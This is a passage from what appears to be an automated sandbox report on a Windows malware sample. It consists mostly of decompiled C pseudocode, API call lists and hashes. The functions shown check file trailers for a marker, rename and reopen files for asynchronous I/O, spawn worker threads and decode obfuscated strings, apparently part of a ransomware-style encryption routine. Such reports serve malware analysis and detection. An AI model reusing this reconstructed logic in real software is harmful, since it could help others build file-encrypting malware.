                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6c35e43003ad74b729ccb247a21fc36fddf1681639cbfeb9f226fb1ab75a511f
                  • Instruction ID: f2c957a99a568e230d0724477146932e10b1b6654603d9f0d8c7505196e082ad
                  • Opcode Fuzzy Hash: 6c35e43003ad74b729ccb247a21fc36fddf1681639cbfeb9f226fb1ab75a511f
                  • Instruction Fuzzy Hash: 32810470940208FFDF219FA0EC49FADBB75FB24316F604455F619AA2A0C7728A51EF60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0E3B8 Relevance: 6.1, APIs: 4, Instructions: 61fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 615 d0e3b8-d0e3f6 SetFileAttributesW CreateFileW 616 d0e3f8-d0e415 SetFilePointerEx 615->616 617 d0e46d-d0e474 615->617 618 d0e464 616->618 619 d0e417-d0e434 ReadFile 616->619 618->617 619->618 620 d0e436-d0e44b call d0e2ac 619->620 620->618 623 d0e44d-d0e455 620->623 624 d0e457 623->624 625 d0e45e-d0e45f call d0684c 623->625 624->625 625->618
                  C-Code - Quality: 69%
                  			E00D0E3B8(WCHAR* _a4) {
				struct _OVERLAPPED* _v8;
				void* _v12;
				long _v16;
				char _v144;
				void _v148;
				void* _t16;
				int _t20;
				int _t24;
				intOrPtr* _t29;

				_v8 = 0;
				SetFileAttributesW(_a4, 0x80); // executed
				_t16 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0); // executed
				_v12 = _t16;
				if(_v12 == 0xffffffff) {
					L8:
					return _v8;
				}
				asm("sbb edx, 0x0");
				_push(2);
				_t20 = SetFilePointerEx(_v12, 0xffffffffffffff7c, 0, 0); // executed
				if(_t20 != 0) {
					_t24 = ReadFile(_v12,  &_v148, 0x84,  &_v16, 0); // executed
					if(_t24 != 0) {
						_t29 = E00D0E2AC( &_v144, 0x80);
						if(_t29 != 0) {
							if( *_t29 == _v148) {
								_v8 = 1;
							}
							E00D0684C(_t29);
						}
					}
				}
				 *0xd254d0(_v12);
				goto L8;
			}












                  0x00d0e3c2
                  0x00d0e3d1
                  0x00d0e3e9
                  0x00d0e3ef
                  0x00d0e3f6
                  0x00d0e46d
                  0x00d0e474
                  0x00d0e474
                  0x00d0e401
                  0x00d0e404
                  0x00d0e40d
                  0x00d0e415
                  0x00d0e42c
                  0x00d0e434
                  0x00d0e447
                  0x00d0e44b
                  0x00d0e455
                  0x00d0e457
                  0x00d0e457
                  0x00d0e45f
                  0x00d0e45f
                  0x00d0e44b
                  0x00d0e434
                  0x00d0e467
                  0x00000000

                  APIs
                  • SetFileAttributesW.KERNELBASE(00000000,00000080,?), ref: 00D0E3D1
                  • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00D0E3E9
                  • SetFilePointerEx.KERNELBASE(000000FF,-00000084,00000000,00000000,00000002), ref: 00D0E40D
                  • ReadFile.KERNELBASE(000000FF,?,00000084,?,00000000), ref: 00D0E42C
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$AttributesCreatePointerRead
                  • String ID:
                  • API String ID: 4170910816-0
                  • Opcode ID: 77c056ed81ee1e673988f3d4576c27bf806a7dfaf4853dcbf7b7a978a87731e9
                  • Instruction ID: f8fceb229df6c8d94ad7b2bf35b493ad7a832f93f9f03bab517740dea93b9af6
                  • Opcode Fuzzy Hash: 77c056ed81ee1e673988f3d4576c27bf806a7dfaf4853dcbf7b7a978a87731e9
                  • Instruction Fuzzy Hash: 14113A30A40308FBEF309FA0EC49FA9BBB9FB04700F548164B618E61E5DB71DA558B25
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0EEC8 Relevance: 4.6, APIs: 3, Instructions: 139fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 627 d0eec8-d0eee3 628 d0f0b1-d0f0ba 627->628 629 d0eee9-d0eef3 call d0e308 627->629 632 d0f0a9-d0f0ac call d0684c 629->632 633 d0eef9-d0ef03 call d0e3b8 629->633 632->628 633->632 637 d0ef09-d0ef13 call d0eb34 633->637 640 d0ef15-d0ef26 call d0eb5c 637->640 641 d0ef28-d0ef36 call d0ec40 637->641 646 d0ef39-d0ef3d 640->646 641->646 646->632 647 d0ef43-d0ef53 MoveFileExW 646->647 648 d0ef55 647->648 649 d0ef57-d0ef62 647->649 650 d0efa3-d0efa7 648->650 651 d0ef90-d0ef9f call d0684c 649->651 652 d0ef64-d0ef88 call d0684c call d0ec40 649->652 655 d0f09b-d0f09f 650->655 656 d0efad-d0efcf CreateFileW 650->656 651->650 667 d0ef8a 652->667 668 d0ef8c 652->668 655->632 659 d0f0a1-d0f0a4 call d0684c 655->659 657 d0efd1 656->657 658 d0efd6-d0efef call d0ec8c 656->658 657->655 670 d0eff1-d0effa 658->670 671 d0efff-d0f014 CreateIoCompletionPort 658->671 659->632 667->650 668->647 670->655 672 d0f016-d0f036 call d0684c 671->672 673 d0f038-d0f05a 671->673 672->655 677 d0f05c-d0f07c call d0684c 673->677 678 d0f07e-d0f094 673->678 677->655 678->655
                  C-Code - Quality: 41%
                  			E00D0EEC8(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				WCHAR* _v16;
				void* _t41;
				void* _t43;
				int _t46;
				void* _t49;
				void* _t51;
				void* _t52;
				void* _t67;

				_v8 = 0;
				_v16 = 0;
				if(_a4 == 0) {
					L27:
					return _v8;
				}
				_t41 = E00D0E308(_a4); // executed
				if(_t41 == 0) {
					L26:
					E00D0684C(_a4);
					goto L27;
				}
				_t43 = E00D0E3B8(_a4); // executed
				if(_t43 == 0) {
					_push(_a4);
					if(E00D0EB34() == 0) {
						_v16 = E00D0EC40(_a4,  *0xd25178);
					} else {
						_v16 = E00D0EB5C(_a4,  *0xd25178);
					}
					if(_v16 == 0) {
						goto L26;
					} else {
						goto L7;
					}
					while(1) {
						L7:
						_t46 = MoveFileExW(_a4, _v16, 8); // executed
						if(_t46 != 0) {
							break;
						}
						if( *[fs:0x34] != 0xb7) {
							E00D0684C(_v16);
							_v16 = 0;
							break;
						}
						E00D0684C(_v16);
						_v16 = 0;
						_v16 = E00D0EC40(_a4,  *0xd25178);
						if(_v16 != 0) {
							continue;
						}
						break;
					}
					if(_v16 != 0) {
						_t49 = CreateFileW(_v16, 0xc0000000, 0, 0, 3, 0x40000000, 0); // executed
						_v12 = _t49;
						if(_v12 != 0xffffffff) {
							_t51 = E00D0EC8C( *0xd25770(_a4), _a8, _a12); // executed
							_t67 = _t51;
							if(_t67 != 0) {
								_t52 = CreateIoCompletionPort(_v12,  *0xd25880, 0, 0); // executed
								if(_t52 != 0) {
									_push(_v12);
									_pop( *_t32);
									 *(_t67 + 0x28) = 0;
									_push(_t67);
									_push(0);
									_push(0);
									_push( *0xd25880);
									if( *0xd25558() != 0) {
										 *0xd2555c(0xd2588c);
										 *0xd2555c(0xd25884);
										_v8 = 1;
									} else {
										 *0xd25428(_t67, 0, 0x398);
										E00D0684C(_t67);
										 *0xd254d0(_v12);
									}
								} else {
									 *0xd25428(_t67, 0, 0x398);
									E00D0684C(_t67);
									 *0xd254d0(_v12);
								}
							} else {
								 *0xd254d0(_v12);
							}
						}
					}
					if(_v16 != 0) {
						E00D0684C(_v16);
					}
				}
			}













                  0x00d0eed1
                  0x00d0eed8
                  0x00d0eee3
                  0x00d0f0b1
                  0x00d0f0ba
                  0x00d0f0ba
                  0x00d0eeec
                  0x00d0eef3
                  0x00d0f0a9
                  0x00d0f0ac
                  0x00000000
                  0x00d0f0ac
                  0x00d0eefc
                  0x00d0ef03
                  0x00d0ef09
                  0x00d0ef13
                  0x00d0ef36
                  0x00d0ef15
                  0x00d0ef23
                  0x00d0ef23
                  0x00d0ef3d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00d0ef43
                  0x00d0ef43
                  0x00d0ef4b
                  0x00d0ef53
                  0x00d0ef55
                  0x00d0ef55
                  0x00d0ef62
                  0x00d0ef93
                  0x00d0ef98
                  0x00000000
                  0x00d0ef98
                  0x00d0ef67
                  0x00d0ef6c
                  0x00d0ef81
                  0x00d0ef88
                  0x00000000
                  0x00d0ef8c
                  0x00000000
                  0x00d0ef8a
                  0x00d0efa7
                  0x00d0efc2
                  0x00d0efc8
                  0x00d0efcf
                  0x00d0efe6
                  0x00d0efeb
                  0x00d0efef
                  0x00d0f00c
                  0x00d0f014
                  0x00d0f038
                  0x00d0f03b
                  0x00d0f03e
                  0x00d0f047
                  0x00d0f048
                  0x00d0f04a
                  0x00d0f04c
                  0x00d0f05a
                  0x00d0f083
                  0x00d0f08e
                  0x00d0f094
                  0x00d0f05c
                  0x00d0f064
                  0x00d0f06e
                  0x00d0f076
                  0x00d0f076
                  0x00d0f016
                  0x00d0f01e
                  0x00d0f028
                  0x00d0f030
                  0x00d0f030
                  0x00d0eff1
                  0x00d0eff4
                  0x00d0eff4
                  0x00d0efef
                  0x00d0efcf
                  0x00d0f09f
                  0x00d0f0a4
                  0x00d0f0a4
                  0x00d0f09f

                  APIs
                    • Part of subcall function 00D0E308: SetFileAttributesW.KERNELBASE(00000000,00000080,?,00000000,?,?,?), ref: 00D0E329
                    • Part of subcall function 00D0E308: CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?,?,?), ref: 00D0E341
                    • Part of subcall function 00D0E3B8: SetFileAttributesW.KERNELBASE(00000000,00000080,?), ref: 00D0E3D1
                    • Part of subcall function 00D0E3B8: CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00D0E3E9
                    • Part of subcall function 00D0E3B8: SetFilePointerEx.KERNELBASE(000000FF,-00000084,00000000,00000000,00000002), ref: 00D0E40D
                    • Part of subcall function 00D0E3B8: ReadFile.KERNELBASE(000000FF,?,00000084,?,00000000), ref: 00D0E42C
                  • MoveFileExW.KERNELBASE(00000000,00000000,00000008,00000000,00000000,00000000,00000000,?,00000000,?), ref: 00D0EF4B
                  • CreateIoCompletionPort.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,00000000,?), ref: 00D0F00C
                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000003,40000000,00000000,00000000,?,00000000,?), ref: 00D0EFC2
                    • Part of subcall function 00D0684C: RtlFreeHeap.NTDLL(?,00000000,00000000,?,00D17745,00000000), ref: 00D0685D
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Create$Attributes$CompletionFreeHeapMovePointerPortRead
                  • String ID:
                  • API String ID: 97630321-0
                  • Opcode ID: 9b5d38708d8e5c66a29e535d791c13c9a381fc601d6262ca1932be321bb3ee4f
                  • Instruction ID: 9620e0b15fb3232fe7b72933c8f8e7e8ce06c0be044575948f55f00df1d641a7
                  • Opcode Fuzzy Hash: 9b5d38708d8e5c66a29e535d791c13c9a381fc601d6262ca1932be321bb3ee4f
                  • Instruction Fuzzy Hash: D5514370900709FAEF216FA0EC09B9DBF75EF24315F248464F509A51E2D7B68AA19F70
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0C0F8 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 688 d0c0f8-d0c10d 689 d0c114-d0c125 call d068fc 688->689 690 d0c10f 688->690 694 d0c127 689->694 695 d0c12c-d0c13a GetFileAttributesW 689->695 691 d0c1df-d0c1e3 690->691 694->691 696 d0c158-d0c178 call d016d0 695->696 697 d0c13c-d0c156 call d016d0 695->697 704 d0c17b-d0c17f 696->704 697->704 706 d0c181-d0c198 call d0c1e8 call d0684c 704->706 707 d0c19a-d0c1a0 704->707 706->691 708 d0c1b1-d0c1bc GetFileAttributesW 707->708 709 d0c1a2-d0c1a5 call d0c1e8 707->709 712 d0c1ca-d0c1da CopyFileW call d0684c 708->712 713 d0c1be-d0c1c8 call d0684c 708->713 716 d0c1aa-d0c1af 709->716 712->691 713->709 716->691
                  C-Code - Quality: 73%
                  			E00D0C0F8(void* __eax, intOrPtr _a4, WCHAR** _a8) {
				WCHAR* _v8;
				WCHAR* _t23;
				signed int _t24;
				long _t28;
				WCHAR* _t33;
				void* _t35;
				WCHAR** _t38;

				_v8 = 0;
				if( *0xd25158 != 0) {
					_t23 = E00D068FC(_a4, 0x1a);
					_v8 = _t23;
					if(_v8 != 0) {
						_t24 = GetFileAttributesW(_v8); // executed
						if((_t24 & 0x00000010) == 0) {
							 *0xd25784(_v8);
							E00D016D0(_v8);
							 *0xd25440(_v8,  *0xd2517c);
						} else {
							E00D016D0(_v8);
							 *0xd25440(_v8,  *0xd2517c);
						}
						if(_a8 != 0) {
							_t38 = _a8;
							if( *_t38 != 0) {
								_t28 = GetFileAttributesW( *_t38); // executed
								if(_t28 != 0xffffffff) {
									CopyFileW( *_t38, _v8, 0); // executed
									return E00D0684C(_v8);
								}
								E00D0684C( *_t38);
								 *_t38 = 0;
							}
							E00D0C1E8(_v8); // executed
							_t33 = _v8;
							 *_t38 = _t33;
							return _t33;
						} else {
							E00D0C1E8(_v8);
							_t35 = E00D0684C(_v8);
							_v8 = 0;
							return _t35;
						}
					}
					return _t23;
				}
				return __eax;
			}










                  0x00d0c0ff
                  0x00d0c10d
                  0x00d0c119
                  0x00d0c11e
                  0x00d0c125
                  0x00d0c12f
                  0x00d0c13a
                  0x00d0c15b
                  0x00d0c164
                  0x00d0c172
                  0x00d0c13c
                  0x00d0c13f
                  0x00d0c14d
                  0x00d0c153
                  0x00d0c17f
                  0x00d0c19a
                  0x00d0c1a0
                  0x00d0c1b3
                  0x00d0c1bc
                  0x00d0c1d1
                  0x00000000
                  0x00d0c1da
                  0x00d0c1c0
                  0x00d0c1c5
                  0x00d0c1c5
                  0x00d0c1a5
                  0x00d0c1aa
                  0x00d0c1ad
                  0x00000000
                  0x00d0c181
                  0x00d0c184
                  0x00d0c18c
                  0x00d0c191
                  0x00000000
                  0x00d0c191
                  0x00d0c17f
                  0x00000000
                  0x00d0c125
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 94ec20fbcf3cfb408d39201ceb7466833ceab48be343725f9058e34c599a6718
                  • Instruction ID: 33ab5941c4ff6d68705108b6c85691d471b9ec8fd0ecc936941f93a2868c00ef
                  • Opcode Fuzzy Hash: 94ec20fbcf3cfb408d39201ceb7466833ceab48be343725f9058e34c599a6718
                  • Instruction Fuzzy Hash: 1321C730850208EBDF22AFA4ED46B5C7A72EB15315F6452A0E44AA51E6C7724F61BB32
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0A458 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E00D0A458(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				void _v20;
				void* _t25;
				void* _t32;

				_v20 = _a8;
				_v16 = _a12;
				_v12 = 0;
				_v8 = 0;
				_t25 = CreateThread(0, 0, E00D0A440,  &_v20, 4, 0); // executed
				_v8 = _t25;
				if(_v8 == 0) {
					L5:
					return _v12;
				} else {
					if(_a4 == 0) {
						L4:
						ResumeThread(_v8); // executed
						 *0xd25548(_v8, 0xffffffff);
						GetExitCodeThread(_v8,  &_v12); // executed
						 *0xd254d0(_v8);
						goto L5;
					} else {
						_t32 = E00D0B390(_a4, _v8); // executed
						if(_t32 != 0) {
							goto L4;
						} else {
							 *0xd254cc(_v8, 0);
							 *0xd254d0(_v8);
							return _v12;
						}
					}
				}
			}









                  0x00d0a461
                  0x00d0a467
                  0x00d0a46a
                  0x00d0a471
                  0x00d0a489
                  0x00d0a48f
                  0x00d0a496
                  0x00d0a4f4
                  0x00d0a4fa
                  0x00d0a498
                  0x00d0a49c
                  0x00d0a4ca
                  0x00d0a4cd
                  0x00d0a4d8
                  0x00d0a4e5
                  0x00d0a4ee
                  0x00000000
                  0x00d0a49e
                  0x00d0a4a4
                  0x00d0a4ab
                  0x00000000
                  0x00d0a4ad
                  0x00d0a4b2
                  0x00d0a4bb
                  0x00d0a4c7
                  0x00d0a4c7
                  0x00d0a4ab
                  0x00d0a49c

                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,00D0A440,?,00000004,00000000), ref: 00D0A489
                  • ResumeThread.KERNELBASE(00000000), ref: 00D0A4CD
                  • GetExitCodeThread.KERNELBASE(00000000,00000000), ref: 00D0A4E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Thread$CodeCreateExitResume
                  • String ID:
                  • API String ID: 4070214711-0
                  • Opcode ID: f071ebc5ea22c45079f23f7eb683ebbc0483438f76f89f91dab7d2d63b8dac14
                  • Instruction ID: 955857cfb5cf18c2b828f04b3d2cee4f0aa973e7440a5ab53a0a3b74db4a1578
                  • Opcode Fuzzy Hash: f071ebc5ea22c45079f23f7eb683ebbc0483438f76f89f91dab7d2d63b8dac14
                  • Instruction Fuzzy Hash: 2B11D234900208FFDB20DF94ED09FADBBB5FB14312F2081A5F918A62A0D7719A51EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D0A190 Relevance: 4.5, APIs: 3, Instructions: 46threadCOMMON
                  Download Yara Rule
                  C-Code - Quality: 37%
                  			E00D0A190(intOrPtr _a4, void* _a8) {
				void* _v8;
				long _v12;
				void* _t18;
				void* _t25;

				_v12 = 0;
				_v8 = 0;
				_t18 = CreateThread(0, 0, E00D0A180, _a8, 4, 0); // executed
				_v8 = _t18;
				if(_v8 == 0) {
					L5:
					return _v12;
				} else {
					if(_a4 == 0) {
						L4:
						ResumeThread(_v8); // executed
						 *0xd25548(_v8, 0xffffffff);
						GetExitCodeThread(_v8,  &_v12); // executed
						 *0xd254d0(_v8);
						goto L5;
					} else {
						_t25 = E00D0B390(_a4, _v8); // executed
						if(_t25 != 0) {
							goto L4;
						} else {
							 *0xd254cc(_v8, 0);
							 *0xd254d0(_v8);
							return _v12;
						}
					}
				}
			}







                  0x00d0a196
                  0x00d0a19d
                  0x00d0a1b4
                  0x00d0a1ba
                  0x00d0a1c1
                  0x00d0a21f
                  0x00d0a225
                  0x00d0a1c3
                  0x00d0a1c7
                  0x00d0a1f5
                  0x00d0a1f8
                  0x00d0a203
                  0x00d0a210
                  0x00d0a219
                  0x00000000
                  0x00d0a1c9
                  0x00d0a1cf
                  0x00d0a1d6
                  0x00000000
                  0x00d0a1d8
                  0x00d0a1dd
                  0x00d0a1e6
                  0x00d0a1f2
                  0x00d0a1f2
                  0x00d0a1d6
                  0x00d0a1c7

                  APIs
                  • CreateThread.KERNELBASE(00000000,00000000,00D0A180,?,00000004,00000000), ref: 00D0A1B4
                  • ResumeThread.KERNELBASE(00000000), ref: 00D0A1F8
                  • GetExitCodeThread.KERNELBASE(00000000,00000000), ref: 00D0A210
                  Memory Dump Source
                  • Source File: 00000000.00000002.519889486.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                  • Associated: 00000000.00000002.519778542.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520073523.0000000000D1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520095352.0000000000D1B000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520253617.0000000000D24000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520309834.0000000000D26000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.520349173.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_d00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Thread$CodeCreateExitResume
                  • String ID:
                  • API String ID: 4070214711-0
                  • Opcode ID: fbee16066e6d8eedc013a808c88c504521396499c49c6b96b522746e3c28a6e7
                  • Instruction ID: d0ab984b78f356b78a4a124855c399c9273291aea6bbd3a724419b43bd7e5b3f
                  • Opcode Fuzzy Hash: fbee16066e6d8eedc013a808c88c504521396499c49c6b96b522746e3c28a6e7
                  • Instruction Fuzzy Hash: 8F11E531940308FFDB219F94ED0AF9CBB71EB14322F204191F914A62E0D7725B55EB65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00D077FC Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 295COMMON
                  Download Yara Rule
                  C-Code - Quality: 38%
                  			E00D077FC() {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				char _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				char _v96;
				char _v112;
				char _v128;
				char _v152;
				char _v160;
				char _v168;
				char _v220;
				char _v284;
				char _v332;
				char _v460;
				void* _t142;
				intOrPtr* _t143;
				intOrPtr* _t145;
				intOrPtr* _t147;
				intOrPtr* _t149;
				intOrPtr* _t151;
				intOrPtr* _t153;
				intOrPtr* _t155;
				intOrPtr* _t157;
				intOrPtr* _t159;
				intOrPtr* _t161;
				void* _t166;
				void* _t170;
				void* _t176;
				void* _t197;
				void* _t231;

				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_v24 = 0;
				_t142 =  *0xd25744(0); // executed
				if(_t142 == 0) {
					_t143 =  &_v80;
					 *_t143 = 0x7c7915f4;
					 *((intOrPtr*)(_t143 + 4)) = 0xa62dd110;
					 *((intOrPtr*)(_t143 + 8)) = 0x77fcdb95;
					 *((intOrPtr*)(_t143 + 0xc)) = 0x48019877;
					E00D01250(_t143, _t143, 4);
					_t145 =  &_v96;
					 *_t145 = 0x6beee6bf;
					 *((intOrPtr*)(_t145 + 4)) = 0xa6333347;
					 *((intOrPtr*)(_t145 + 8)) = 0x1dfc0db0;
					 *((intOrPtr*)(_t145 + 0xc)) = 0x93d20b38;
					E00D01250(_t145, _t145, 4);
					_t147 =  &_v112;
					 *_t147 = 0xd0b726a0;
					 *((intOrPtr*)(_t147 + 4)) = 0xa62caeaa;
					 *((intOrPtr*)(_t147 + 8)) = 0x77fc3195;
					 *((intOrPtr*)(_t147 + 0xc)) = 0x48019877;
					E00D01250(_t147, _t147, 4);
					_t149 =  &_v128;
					 *_t149 = 0xf350e64c;
					 *((intOrPtr*)(_t149 + 4)) = 0xa62ca8c4;
					 *((intOrPtr*)(_t149 + 8)) = 0x77fc3c98;
					 *((intOrPtr*)(_t149 + 0xc)) = 0x9774f677;
					E00D01250(_t149, _t149, 4);
					_t151 =  &_v332;
					 *_t151 = 0xb7a34067;
					 *((intOrPtr*)(_t151 + 4)) = 0xb78e4068;
					 *((intOrPtr*)(_t151 + 8)) = 0xb78a4057;
					 *((intOrPtr*)(_t151 + 0xc)) = 0xb7984051;
					 *((intOrPtr*)(_t151 + 0x10)) = 0xb78e405d;
					 *((intOrPtr*)(_t151 + 0x14)) = 0xb78e4079;
					 *((intOrPtr*)(_t151 + 0x18)) = 0xb794405b;
					 *((intOrPtr*)(_t151 + 0x1c)) = 0xb7884051;
					 *((intOrPtr*)(_t151 + 0x20)) = 0xb79f405d;
					 *((intOrPtr*)(_t151 + 0x24)) = 0xb789404c;
					 *((intOrPtr*)(_t151 + 0x28)) = 0xb799404a;
					 *((intOrPtr*)(_t151 + 0x2c)) = 0xb7fc4038;
					E00D01250(_t151, _t151, 0xc);
					_t153 =  &_v152;
					 *_t153 = 0xb7b3406a;
					 *((intOrPtr*)(_t153 + 4)) = 0xb7a84077;
					 *((intOrPtr*)(_t153 + 8)) = 0xb7bf4064;
					 *((intOrPtr*)(_t153 + 0xc)) = 0xb7b14071;
					 *((intOrPtr*)(_t153 + 0x10)) = 0xb7ce406e;
					 *((intOrPtr*)(_t153 + 0x14)) = 0xb7fc4038;
					E00D01250(_t153, _t153, 6);
					_t155 =  &_v168;
					 *_t155 = 0xb7b84071;
					 *((intOrPtr*)(_t155 + 4)) = 0xb7fc4038;
					E00D01250(_t155, _t155, 2);
					_t157 =  &_v284;
					 *_t157 = 0xb7b9406b;
					 *((intOrPtr*)(_t157 + 4)) = 0xb7b94074;
					 *((intOrPtr*)(_t157 + 8)) = 0xb7a8407b;
					 *((intOrPtr*)(_t157 + 0xc)) = 0xb7d64018;
					 *((intOrPtr*)(_t157 + 0x10)) = 0xb7ba4018;
					 *((intOrPtr*)(_t157 + 0x14)) = 0xb7b3406a;
					 *((intOrPtr*)(_t157 + 0x18)) = 0xb7dc4075;
					 *((intOrPtr*)(_t157 + 0x1c)) = 0xb795406f;
					 *((intOrPtr*)(_t157 + 0x20)) = 0xb7cf4056;
					 *((intOrPtr*)(_t157 + 0x24)) = 0xb7a3400a;
					 *((intOrPtr*)(_t157 + 0x28)) = 0xb794406b;
					 *((intOrPtr*)(_t157 + 0x2c)) = 0xb7984059;
					 *((intOrPtr*)(_t157 + 0x30)) = 0xb78b4057;
					 *((intOrPtr*)(_t157 + 0x34)) = 0xb793407b;
					 *((intOrPtr*)(_t157 + 0x38)) = 0xb7854048;
					 *((intOrPtr*)(_t157 + 0x3c)) = 0xb7fc4038;
					E00D01250(_t157, _t157, 0x10);
					_t159 =  &_v160;
					 *_t159 = 0xb7ad406f;
					 *((intOrPtr*)(_t159 + 4)) = 0xb7fc4074;
					E00D01250(_t159, _t159, 2);
					_t161 =  &_v220;
					 *_t161 = 0xb795406f;
					 *((intOrPtr*)(_t161 + 4)) = 0xb7cf4056;
					 *((intOrPtr*)(_t161 + 8)) = 0xb7a3400a;
					 *((intOrPtr*)(_t161 + 0xc)) = 0xb794406b;
					 *((intOrPtr*)(_t161 + 0x10)) = 0xb7984059;
